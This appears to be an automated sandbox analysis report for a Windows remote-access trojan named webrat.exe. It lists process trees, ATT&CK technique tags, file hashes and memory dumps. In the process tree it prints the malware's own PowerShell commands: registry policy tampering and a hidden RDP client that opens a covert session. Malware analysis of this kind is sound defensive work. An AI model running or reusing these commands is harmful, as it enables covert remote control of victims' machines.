PID 4532 wrote to memory of 5100	4532	spoolsv.exe	124
PID 4532 wrote to memory of 5100	4532	spoolsv.exe	124
PID 4532 wrote to memory of 5100	4532	spoolsv.exe	124
PID 4532 wrote to memory of 5048	4532	spoolsv.exe	125
PID 4532 wrote to memory of 5048	4532	spoolsv.exe	125
PID 4532 wrote to memory of 5048	4532	spoolsv.exe	125
PID 4532 wrote to memory of 2600	4532	spoolsv.exe	128
PID 4532 wrote to memory of 2600	4532	spoolsv.exe	128
PID 4532 wrote to memory of 2600	4532	spoolsv.exe	128
PID 4532 wrote to memory of 6028	4532	spoolsv.exe	130
PID 4532 wrote to memory of 6028	4532	spoolsv.exe	130
PID 4532 wrote to memory of 6028	4532	spoolsv.exe	130
PID 4532 wrote to memory of 3268	4532	spoolsv.exe	132
PID 4532 wrote to memory of 3268	4532	spoolsv.exe	132
PID 4532 wrote to memory of 3268	4532	spoolsv.exe	132
PID 4532 wrote to memory of 1540	4532	spoolsv.exe	134
PID 4532 wrote to memory of 1540	4532	spoolsv.exe	134
PID 4532 wrote to memory of 1540	4532	spoolsv.exe	134
PID 4532 wrote to memory of 5512	4532	spoolsv.exe	136
PID 4532 wrote to memory of 5512	4532	spoolsv.exe	136
PID 4532 wrote to memory of 5512	4532	spoolsv.exe	136

C:\Users\Admin\AppData\Local\Temp\webrat.exe
"C:\Users\Admin\AppData\Local\Temp\webrat.exe"
1⤵
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1756
- C:\Program Files (x86)\Windows NT\spoolsv.exe
  "C:\Program Files (x86)\Windows NT\spoolsv.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Modifies system certificate store
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4532
- - C:\Program Files\Google\Chrome\Application\spoolsv.exe
    "C:\Program Files\Google\Chrome\Application\spoolsv.exe" -
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5108
- - C:\Program Files (x86)\Microsoft\Edge\Application\spoolsv.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\spoolsv.exe" -
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:5268
- - C:\Program Files\Google\Chrome\Application\spoolsv.exe
    "C:\Program Files\Google\Chrome\Application\spoolsv.exe" -
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4092
- - C:\Program Files (x86)\Microsoft\Edge\Application\spoolsv.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\spoolsv.exe" -
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4740
- - C:\Program Files\Google\Chrome\Application\spoolsv.exe
    "C:\Program Files\Google\Chrome\Application\spoolsv.exe" -
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:4572
- - C:\Program Files (x86)\Microsoft\Edge\Application\spoolsv.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\spoolsv.exe" -
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:5104
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2672
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5044
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe " Set-ItemProperty -Path \"HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\System\" -Name \"shutdownwithoutlogon\" -Value 1 -Type DWord Set-ItemProperty -Path \"HKLM:\SYSTEM\CurrentControlSet\Control\Error Message Instrument\" -Name \"EnableDefaultReply\" -Value 1 -Type DWord Set-ItemProperty -Path \"HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\" -Name \"ShutdownWarningDialogTimeout\" -Value 1 -Type DWord "
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5100
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe " [void][system.reflection.Assembly]::LoadFrom('C:\Users\Admin\AppData\Local\Temp\MSTSCLib.dll') [void][system.reflection.Assembly]::LoadFrom('C:\Users\Admin\AppData\Local\Temp\AxMSTSCLib.dll') Add-Type -Assembly System.Windows.Forms Add-Type -AssemblyName System.Drawing $form = New-Object System.Windows.Forms.Form $rdp = New-Object AxMSTSCLib.AxMsRdpClient8NotSafeForScripting $form.Controls.Add($rdp) $form.Size = New-Object System.Drawing.Size(0,0) $form.ShowInTaskbar = $false $form.WindowState = 1; $form.FormBorderStyle = 0; function func { $rdp.AdvancedSettings2.DisplayConnectionBar = 'true' $rdp.AdvancedSettings7.EnableCredSspSupport = 'true' $rdp.DesktopHeight = 1080; $rdp.DesktopWidth = 1920; [object]$robj = $true [MSTSCLib.IMsRdpExtendedSettings] | ForEach-Object { $_.GetProperty(\"Property\").SetValue( $rdp.GetOcx(), $robj, @(\"ConnectToChildSession\") ) } $rdp.Connect() } $form.add_Shown({ func } ) $form.ShowDialog() "
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:5048
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:2600
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:6028
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:3268
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    PID:1540
- - C:\Program Files (x86)\Windows NT\spoolsv.exe
    "C:\Program Files (x86)\Windows NT\spoolsv.exe" k
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5512

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5052

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5616

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5596

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4472

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:1408

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4348

C:\Program Files (x86)\Microsoft\taskhostw.exe
"C:\Program Files (x86)\Microsoft\taskhostw.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2020

C:\Program Files (x86)\Windows NT\spoolsv.exe
"C:\Program Files (x86)\Windows NT\spoolsv.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5708

C:\Program Files (x86)\Microsoft\taskhostw.exe
"C:\Program Files (x86)\Microsoft\taskhostw.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1324

C:\Program Files (x86)\Windows NT\spoolsv.exe
"C:\Program Files (x86)\Windows NT\spoolsv.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4692

C:\Program Files (x86)\Microsoft\taskhostw.exe
"C:\Program Files (x86)\Microsoft\taskhostw.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3384

C:\Program Files (x86)\Windows NT\spoolsv.exe
"C:\Program Files (x86)\Windows NT\spoolsv.exe"
1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5240

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\Windows NT\spoolsv.exe

Filesize
3.1MB

MD5
1c3b8bd025d5b9663dd0e02d3405e0df

SHA1
92b07502328992e7fc21a11fac39f93cceffeb22

SHA256
18c5e65e4b9da90324c170b3f5f20a1dc8c818b38dcde6b146c3af1f423def3f

SHA512
a49523270de2a235aedbd1698d01a70f6d4967e06287e8b8630b1b11758bdb56507fc066d6d404e850e60c6fd9ef2cb075fa3d7085bc24ce9b946d306ff396cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
938ffc2cba917b243d86b2cf76dcefb4

SHA1
234b53d91d075f16cc63c731eefdae278e2faad3

SHA256
5c1eaf13b15f1d5d1ea7f6c3fcbeff0f8b0faf8b9a620ecd26edb49d667f56ca

SHA512
e4ec928e5943a47739c862e3fd0c4bd9f1f21942e2416269f5057f5df49ce451d90acea39ee5319a0828ca1d944c2eda3eb8e7ab19984c7b8624a58f2111c314

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
3a7c70fa8fd7bd92ebe3ac52e1dafeff

SHA1
b466b1b62a72e7dace12ce6f0d8a42a5a121eebe

SHA256
d69638cbf5e3e64542815501099ccb0f550ac34bf136b68493a6434409028720

SHA512
183586212fa33f751610b475fe0a3bb4ff12148201ca235c1f385faae03a912529acd6c714a76262ff7b884fb77085ef163471facf2a15daae5f370f439f9c5f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
0ef85706104bc840e4be32c2703cddf2

SHA1
c0196b1a93e81d522bd76b610d7015082ad3f950

SHA256
068984aa322c7837704b0876eeeb3996c301f639c78dc093b8421d0f4494d755

SHA512
e54c94e063f191617f951c195b312c07afd8e133faa61d7dc02b89f63c0ae0363ebda2dd62144bfa5b270c130e2a4cd72c1663d2627fdae087a2e40221b3d367

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
abed6b549b0948791175a9b0865abd29

SHA1
7d7cae29963e032fa12e873d09224501aff72074

SHA256
cb1a49d842a4747ca496a560b3a7868a740abfe03c8a25b351f09385fa033af5

SHA512
2526e2144ec110aca3796659f652bbc2d458b3f463691e27ab5a18e2f7cc9ef9b7059998b7e29cda12e6ed6b8ee7df577ac87d1582c11a7340033a7c784cdc16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
41aaf1a5e5dfd8c706c975897500f4a1

SHA1
a46ce6ebeff052dd9e1e6ea5b0c3af6dffbd4cd1

SHA256
4ddc211c9682c780d1ede86c8922cc3707b083d12ae07b6e29def37c1d80a4da

SHA512
c0c321805ea0ae91b8bc892a7aedc7e2cf85f7cab2314f52154fefe40a948e5ae4842af2258e225986f7fba4b164e2627b1079b79125db380b593d562efe737a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fwd3kgm1.je1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1756-0-0x0000000000FF0000-0x0000000001B6C000-memory.dmp

Filesize
11.5MB

Download
memory/1756-9-0x0000000000FF0000-0x0000000001B6C000-memory.dmp

Filesize
11.5MB

Download
memory/2020-176-0x0000000000860000-0x00000000013DC000-memory.dmp

Filesize
11.5MB

Download
memory/2672-79-0x0000000006E30000-0x0000000006EA6000-memory.dmp

Filesize
472KB

Download
memory/2672-65-0x00000000054F0000-0x0000000005556000-memory.dmp

Filesize
408KB

Download
memory/2672-61-0x0000000000D70000-0x0000000000DA6000-memory.dmp

Filesize
216KB

Download
memory/2672-78-0x0000000006CD0000-0x0000000006D14000-memory.dmp

Filesize
272KB

Download
memory/2672-77-0x0000000005B60000-0x0000000005BAC000-memory.dmp

Filesize
304KB

Download
memory/2672-76-0x0000000005B40000-0x0000000005B5E000-memory.dmp

Filesize
120KB

Download
memory/2672-62-0x0000000004DE0000-0x0000000005408000-memory.dmp

Filesize
6.2MB

Download
memory/2672-63-0x0000000004B60000-0x0000000004B82000-memory.dmp

Filesize
136KB

Download
memory/2672-75-0x0000000005560000-0x00000000058B4000-memory.dmp

Filesize
3.3MB

Download
memory/2672-81-0x0000000006ED0000-0x0000000006EEA000-memory.dmp

Filesize
104KB

Download
memory/2672-80-0x0000000007530000-0x0000000007BAA000-memory.dmp

Filesize
6.5MB

Download
memory/2672-64-0x0000000005480000-0x00000000054E6000-memory.dmp

Filesize
408KB

Download
memory/4092-35-0x0000000000550000-0x00000000010CC000-memory.dmp

Filesize
11.5MB

Download
memory/4092-34-0x0000000000550000-0x00000000010CC000-memory.dmp

Filesize
11.5MB

Download
memory/4532-189-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-48-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-191-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-195-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-8-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-197-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-47-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-46-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-45-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-44-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-43-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-187-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-199-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-30-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-28-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-27-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-26-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-25-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-24-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-82-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-23-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-185-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-201-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-183-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-22-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-203-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-181-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-205-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-179-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-193-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-165-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-168-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-211-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-170-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-209-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-172-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4532-207-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/4572-52-0x0000000000620000-0x000000000119C000-memory.dmp

Filesize
11.5MB

Download
memory/4572-53-0x0000000000620000-0x000000000119C000-memory.dmp

Filesize
11.5MB

Download
memory/4740-40-0x0000000000380000-0x0000000000EFC000-memory.dmp

Filesize
11.5MB

Download
memory/4740-41-0x0000000000380000-0x0000000000EFC000-memory.dmp

Filesize
11.5MB

Download
memory/5048-120-0x0000000007A90000-0x0000000007A9A000-memory.dmp

Filesize
40KB

Download
memory/5048-118-0x00000000078D0000-0x0000000007962000-memory.dmp

Filesize
584KB

Download
memory/5100-115-0x00000000073F0000-0x0000000007994000-memory.dmp

Filesize
5.6MB

Download
memory/5100-113-0x0000000006DA0000-0x0000000006E36000-memory.dmp

Filesize
600KB

Download
memory/5100-114-0x0000000006D00000-0x0000000006D22000-memory.dmp

Filesize
136KB

Download
memory/5104-59-0x0000000000620000-0x000000000119C000-memory.dmp

Filesize
11.5MB

Download
memory/5104-58-0x0000000000620000-0x000000000119C000-memory.dmp

Filesize
11.5MB

Download
memory/5108-14-0x0000000000CE0000-0x000000000185C000-memory.dmp

Filesize
11.5MB

Download
memory/5108-15-0x0000000000CE0000-0x000000000185C000-memory.dmp

Filesize
11.5MB

Download
memory/5268-21-0x0000000000DF0000-0x000000000196C000-memory.dmp

Filesize
11.5MB

Download
memory/5268-20-0x0000000000DF0000-0x000000000196C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-178-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-182-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-194-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-190-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-196-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-188-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-198-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-186-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-200-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-184-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-202-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-192-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-204-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-180-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-206-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-212-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-208-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-171-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-210-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5512-169-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download
memory/5708-177-0x0000000000010000-0x0000000000B8C000-memory.dmp

Filesize
11.5MB

Download